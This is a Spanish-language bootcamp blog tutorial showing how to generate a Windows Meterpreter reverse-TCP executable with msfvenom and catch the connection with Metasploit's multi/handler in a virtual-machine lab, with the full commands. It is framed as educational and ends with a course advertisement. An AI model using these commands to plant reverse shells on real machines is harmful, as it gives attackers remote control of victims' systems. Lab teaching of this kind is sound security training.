Cómo crear un malware con Metasploit en 3 simples pasos

| Última modificación: 21 de junio de 2024 | Tiempo de Lectura: 4 minutos

Algunos de nuestros reconocimientos:

Premios KeepCoding

¿Sabes cómo crear un malware con Metasploit?

Los malwares o programas maliciosos están diseñados para ejecutar tareas perjudiciales para un sistema informático. En el cibercrimen, se utilizan para robar información, dinero y propiedad intelectual. De hecho, también pueden usarse en el marco de conflictos internacionales y seguridad de los estados.

Debido al prolífico uso que se le da a este tipo de programas, la ciberseguridad se ha convertido en una prioridad para las organizaciones, compañías e individuos de todo el mundo. Para evitar el malware, se han desarrollado softwares antivirus que sirven para detectarlos y monitorizar los daños que le hacen al sistema.

Tipos de malware

El malware abarca una variedad de programas maliciosos, cada uno con sus propios métodos de ataque y objetivos. Algunos tipos comunes de malware incluyen:

  • Virus: Programas que se replican insertando copias de sí mismos en otros programas o archivos.
  • Gusanos: Malware que se replica a sí mismo para propagarse a otros equipos.
  • Troyanos: Programas maliciosos que se disfrazan de software legítimo.
  • Ransomware: Malware que cifra archivos y demanda un rescate para desbloquearlos.
Cómo crear un malware

¿Cómo crear un malware con Metasploit?

Existen diferentes métodos que te ayudan en cómo crear un malware, dado que son programas casi tan antiguos como la propia computación. No obstante, a continuación explicaremos cómo crear un malware que nos permita ejecutar tareas de forma remota en la máquina vulnerada.

Antes de comenzar en el proceso de cómo crear un malware, es necesario aclarar que este malware tutorial se realiza con fines educativos. El propósito de esta técnica es entender cómo funcionan los softwares maliciosos con el fin de evitarlos.

Preparación de las máquinas virtuales

🔴 ¿Quieres entrar de lleno a la Ciberseguridad? 🔴

Descubre el Ciberseguridad Full Stack Bootcamp de KeepCoding. La formación más completa del mercado y con empleabilidad garantizada

👉 Prueba gratis el Bootcamp en Ciberseguridad por una semana

Crea dos máquinas virtuales con tu software de virtualización de preferencia con las siguientes características:

  1. Sistema operativo Windows 7. Lo más recomendable es utilizar la versión lo más antigua posible, ya de este modo evitamos que tenga actualizaciones de seguridad.
  2. Sistema operativo Kali Linux.

Creación del malware

En este tutorial, emplearemos la herramienta Metasploit, específicamente Msfvenom, para crear un archivo malicioso. Msfvenom es un software que facilita la generación de archivos ejecutables destinados a desencadenar el payload en la máquina comprometida. Este payload es un programa malicioso diseñado para ejecutar comandos de forma remota en el sistema afectado.

Para generar el ejecutable del payload con Metasploit, abre una terminal en tu máquina virtual con Kali Linux y ejecuta el siguiente comando para activar Msfvenom:

//Cómo crear un malware malguer
msfvenom -p windows/meterpreter/reverse_tcp LHOST = <ip local> LPORT = <puerto> -f exe > nombredelpayload.exe
  • Msfvenom es la herramienta para crear el ejecutable “nombredelpayload.exe”.
  • – p es un parámetro para establecer el payload de Metasploit que deseas utilizar. Para este ejercicio, hemos escogido un payload tipo Meterpreter, que nos dará completo acceso a la máquina remota.
  • LHOST es la variable que significa host local. Allí debes establecer la dirección IP de tu máquina virtual con Kali. Recuerda usar el modo de red NAT en tus máquinas virtuales, así no utilizarán la dirección IP real de tu red. Para este ejemplo, usaremos la dirección IP ficticia 192.168.172.128
  • LPORT significa puerto local y, allí, puedes escoger cualquiera. Para el ejemplo, elegiremos el número 5555.

En un ejemplo real, el comando se vería así:

//Cómo crear un malware
msfvenom -p windows/meterpreter/reverse_tcp LHOST = 192.168.172.128 LPORT = 5555 -f exe > ejemplo.exe

Sin embargo, al infiltrar el archivo “ejemplo.exe”, que es nuestro malware, en la máquina virtual Windows 7 y ejecutarlo, ¿qué sucedería? Aún nada, porque para ejecutar el payload meterpreter es necesario estar a la escucha desde el puerto 5555 en Kali. Para ello, usaremos el framework de Metasploit.

Escuchar desde el puerto

Ya hemos visto cómo crear un malware con la herramienta Msfvenom de Metasploit. Ahora, completaremos el proceso ejecutando la escucha del puerto 5555 en la máquina virtual con Kali. Para hacer esta acción, comienza iniciando la consola de Metasploit con el comando:

msfconsole

Ahora, usaremos un exploit de tipo handler con el siguiente comando:

use exploit/multi/handler

Para establecer el uso del payload que creamos en el paso anterior, utiliza:

set payload windows/meterpreter/reverse_tcp

También debes establecer valores con las siguientes variables:

set LHOST <ip local>
set LPORT <puerto local>
  • Para el valor LHOST, introduce la dirección IP de tu máquina con Kali.
  • Para el valor LPORT, introduce el número del puerto que hayas elegido.

Finalmente, ejecuta el comando run para quedar a la escucha de lo que suceda en ese puerto, así:

run

Ahora sí, cuando ejecutes el archivo malicioso “ejemplo.exe” en la máquina virtual con Windows 7, verás que se activará el payload de Meterpreter en la consola de Metasploit. Por medio de este payload, obtendrás control total sobre la máquina vulnerada.

Es crucial asegurar las máquinas virtuales y la red local durante el ejercicio para evitar la propagación accidental del malware. Utiliza redes aisladas y toma medidas para proteger tu sistema principal.

Después de realizar las pruebas, asegúrate de limpiar y desinfectar las máquinas virtuales para eliminar cualquier rastro del malware. Restablece las máquinas virtuales a un estado anterior o reinstala el sistema operativo si es necesario.

¿Cómo aprender más?

Si quieres aprender más sobre cómo crear un malware, en KeepCoding te ofrecemos nuestro Ciberseguridad Full Stack Bootcamp. En esta formación intensiva podrás aprender en vivo y con los mejores profesores sobre temas como pentesting, criptografía, análisis de malware y mucho más. ¡No sigas esperando e inscríbete ya para convertirte en un experto de la seguridad informática!

Carlos Cilleruelo

CEO and co-founder of Byron Labs & Coordinador del Bootcamp en Ciberseguridad.

Posts más leídos

¡CONVOCATORIA ABIERTA!

Ciberseguridad

Full Stack Bootcamp

Clases en Directo | Profesores en Activo | Temario 100% actualizado